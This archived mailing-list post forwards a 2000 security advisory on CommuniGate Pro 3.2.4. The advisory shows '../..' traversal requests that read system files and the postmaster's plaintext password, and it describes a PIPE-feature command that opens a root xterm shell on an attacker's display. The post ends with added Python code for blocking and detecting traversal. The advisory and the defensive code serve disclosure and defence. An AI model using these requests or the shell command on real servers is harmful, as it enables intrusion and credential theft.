Vulnerabilities in CommuniGate Pro v3.2.4

From: Boris Tyshkiewitch <bvt_at_mx_ru>
Date: Tue 18 Jul 2000 - 11:35:44 MSD

  If anyone has 3.2.4 installed, delete/rename the Guide directory immediately.

Boris.



This is a forwarded message
From: Lluis Mora <llmora@S21SEC.COM>
To: BUGTRAQ@SECURITYFOCUS.COM <BUGTRAQ@SECURITYFOCUS.COM>
Date: Tuesday, July 18, 2000, 1:09:41 AM
Subject: S21SEC-003: Vulnerabilities in CommuniGate Pro v3.2.4

===8<==============Original message text===============

###############################################################
ID: S21SEC-003-en
Title: Vulnerabilities in Stalker's CommuniGate Pro v3.2.4
Date: 03/04/2000
Status: Vendor contacted
Scope: Remote command execution as superuser
Platforms: Linux, probably others
Author: llmora, fjserna
Location: http://www.s21sec.com/en/avisos/s21sec-003-en.txt
Release: Public
###############################################################

                                S 2 1 S E C

                           http://www.s21sec.com

                Vulnerabilities in Stalker's CommuniGate Pro v3.2.4


About CommuniGate Pro


CommuniGate Pro is a feature-full commercial mail server (http://www.stalker.com/CommuniGatePro/).

It does SMTP message routing, provides POP, IMAP and HTTP access to mail, etc.

The CommuniGate Pro mail server has a built-in web server that allows users to read and send e-mail through the web, as well as allowing the administrator to remotely manage the mail server settings.

By default it opens port 8100/tcp for web users access to mail and port 8010/tcp for web management access.

Vulnerability description


  1. Reading any file in the mail server

CommuniGate provides a useful mapping to access the Web User Guide, which maps the URL /Guide/ to a directory in the CommuniGate subtree. The built-in web server suffers from the well-known "../.." web server problem. If we request a document from the administrative web server /Guide/ mapping, using the "../.." technique, we get to see the file contents:

homer:~$ telnet ilf 8010
Escape character is '^]'.
GET /Guide/../../../../../../../../../../../../../../../etc/motd HTTP/1.0

HTTP/1.0 200 OK
[... the /etc/motd file content is shown]

Connection closed by foreign host.
homer:~$

As CommuniGate runs as root and it doesn't drop any privileges, we are able to access any file in the system, e.g. /etc/shadow, ...

E.g., we can retrieve the postmaster/manager settings file, which includes the plaintext password to access the management website:

homer:~$ telnet ilf 8010
Escape character is '^]'.
GET /Guide/../../../../../../../../../../../var/CommuniGate/Accounts/postmaster.macnt/account.settings HTTP/1.0

HTTP/1.0 200 OK
Content-Length: 61
Date: Mon, 03 Apr 2000 09:17:35 GMT
Content-Type: application/octet-stream
Server: CommuniGatePro/3.2.4
Expires: Tue, 04 Apr 2000 09:17:35 GMT

{ ExternalINBOX = NO; Password = 8093; UseAppPassword = YES;}
Connection closed by foreign host.
homer:~$

2. Remote execution of arbitrary commands as root

This is not a vulnerability in itself but a demonstration of what can be accomplished once an attacker has obtained the postmaster password.

Looking up the features of CommuniGate, we find the PIPE feature. It allows people to send e-mail to a program in the mail server. It's disabled by default, but once we can access the mail server settings using the postmaster password, we can just enable it, make the application directory be /usr/X11R6/bin/, increase the max. process execution time, and send an e-mail to "xterm -display 172.16.2.4:0 -e /bin/sh"@pipe which will open a root xterm in our desktop...

Affected versions and platforms


This bug has been tested on the Linux (non-redhat & redhat) v3.2.4 (the latest stable release) distribution found at www.stalker.com. It has not been tested with other platforms or previous versions, though we strongly believe the bug is platform independent, and can probably be found and reproduced in previous releases.

Current beta versions (as from v3.3b2) don't suffer from this security problem.

Fix information


There is an upcoming stable release (v3.3) that will fix this problem, and currently the v3.3 betas (v3.3b2 or newer) are patched against this attack.

Upgrades are available from the vendor website at http://www.stalker.com.

Additional information


This vulnerability was found and researched by:

 Lluis Mora             llmora@s21sec.com
 Fermin J. Serna        fjserna@s21sec.com

You can find the latest version of this advisory at:

        http://www.s21sec.com/en/avisos/s21sec-003-en.txt

And other S21SEC advisories at http://www.s21sec.com/en/avisos/

===8<===========End of original message text===========
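The "../.." problem described in section 1 of the forwarded advisory, as an added example that is not part of the advisory or of CommuniGate Pro's own code: a Python resolver for a URL mapping such as /Guide/ that refuses any request escaping the mapped directory (percent-encoding is decoded first, so %2e%2e is caught as well), and a check over constructed access-log lines that flags such requests after the fact. The document root /var/CommuniGate/Guide, the log format and the log lines are assumptions made for illustration.

```python
"""Added example (not part of the S21SEC advisory or of CommuniGate Pro):
safe resolution of a URL mapping such as /Guide/ onto a document directory,
plus a check over constructed access-log lines for traversal attempts."""
import posixpath
import re
from urllib.parse import unquote

# Assumed values for illustration; CommuniGate's real Guide directory may differ.
MAPPING_PREFIX = "/Guide/"
DOC_ROOT = "/var/CommuniGate/Guide"


class TraversalError(ValueError):
    """Raised when a request would resolve outside the mapped directory."""


def resolve_mapped_path(url_path, mapping_prefix=MAPPING_PREFIX, doc_root=DOC_ROOT):
    """Return the filesystem path for url_path under mapping_prefix, or raise
    TraversalError if '..' (plain or percent-encoded) would leave doc_root.

    Only string handling is done here; nothing is opened on disk."""
    decoded = unquote(url_path)          # turn %2e%2e into .. before any check
    if "\x00" in decoded:
        raise TraversalError("NUL byte in request path")
    if not decoded.startswith(mapping_prefix):
        raise TraversalError("request is not under the mapping")
    relative = decoded[len(mapping_prefix):]

    # Walk the segments and track depth explicitly: a '..' at depth zero is an
    # escape attempt and is rejected rather than silently collapsed.
    parts = []
    for segment in relative.split("/"):
        if segment in ("", "."):
            continue
        if segment == "..":
            if not parts:
                raise TraversalError("'..' escapes the mapped directory")
            parts.pop()
            continue
        parts.append(segment)

    candidate = posixpath.join(doc_root, *parts)
    # Defence in depth: confirm the result is still inside doc_root.
    root = doc_root.rstrip("/")
    if candidate != root and not candidate.startswith(root + "/"):
        raise TraversalError("resolved path left the document root")
    return candidate


def is_safe_request(url_path, mapping_prefix=MAPPING_PREFIX, doc_root=DOC_ROOT):
    """True if url_path resolves inside the mapped directory."""
    try:
        resolve_mapped_path(url_path, mapping_prefix, doc_root)
        return True
    except TraversalError:
        return False


# Constructed log lines in a common-log-format shape (not real CommuniGate logs).
SAMPLE_LOG = """\
10.0.0.5 - - [03/Apr/2000:09:17:35 +0000] "GET /Guide/index.html HTTP/1.0" 200 1534
10.0.0.9 - - [03/Apr/2000:09:18:02 +0000] "GET /Guide/../../../../etc/motd HTTP/1.0" 200 318
10.0.0.9 - - [03/Apr/2000:09:18:40 +0000] "GET /Guide/%2e%2e/%2e%2e/etc/passwd HTTP/1.0" 200 1101
10.0.0.5 - - [03/Apr/2000:09:19:11 +0000] "GET /Guide/chapter2/../chapter3.html HTTP/1.0" 200 2210
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/\d\.\d"')


def find_traversal_attempts(log_text, mapping_prefix=MAPPING_PREFIX, doc_root=DOC_ROOT):
    """Return (client, path, reason) for each logged request under the mapping
    that would have escaped the document root."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        path = match.group("path")
        if not unquote(path).startswith(mapping_prefix):
            continue                      # other mappings are out of scope here
        try:
            resolve_mapped_path(path, mapping_prefix, doc_root)
        except TraversalError as exc:
            hits.append((line.split()[0], path, str(exc)))
    return hits


if __name__ == "__main__":
    for client, path, reason in find_traversal_attempts(SAMPLE_LOG):
        print(f"{client} {path}: {reason}")
```

The segment walk rejects an escape instead of normalising it away, so the attempt is visible to logging rather than silently turned into a request for a file inside the Guide directory. Two caveats a practitioner would add: the resolver only reasons about the path string, so a symlink placed inside the document root can still point outside it (resolve with the real filesystem, e.g. os.path.realpath, before opening), and no path check substitutes for the mitigation the advisory's root-only finding really calls for, namely not running the web front end with superuser privileges.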

##################################################################
You received this message because you are subscribed to the <CGatePro@mx.ru> mailing list.
To unsubscribe, send a message to <CGatePro-off@mx.ru>
To switch to digest mode - mailto:<CGatePro-digest@mx.ru>
To switch to index mode - mailto:<CGatePro-index@mx.ru>
For administrative requests, the address is <CGatePro-request@mx.ru>
Received Tue Jul 18 07:38:14 2000

This archive was generated by hypermail 2.1.8 : Fri 24 Apr 2015 - 16:12:15 MSK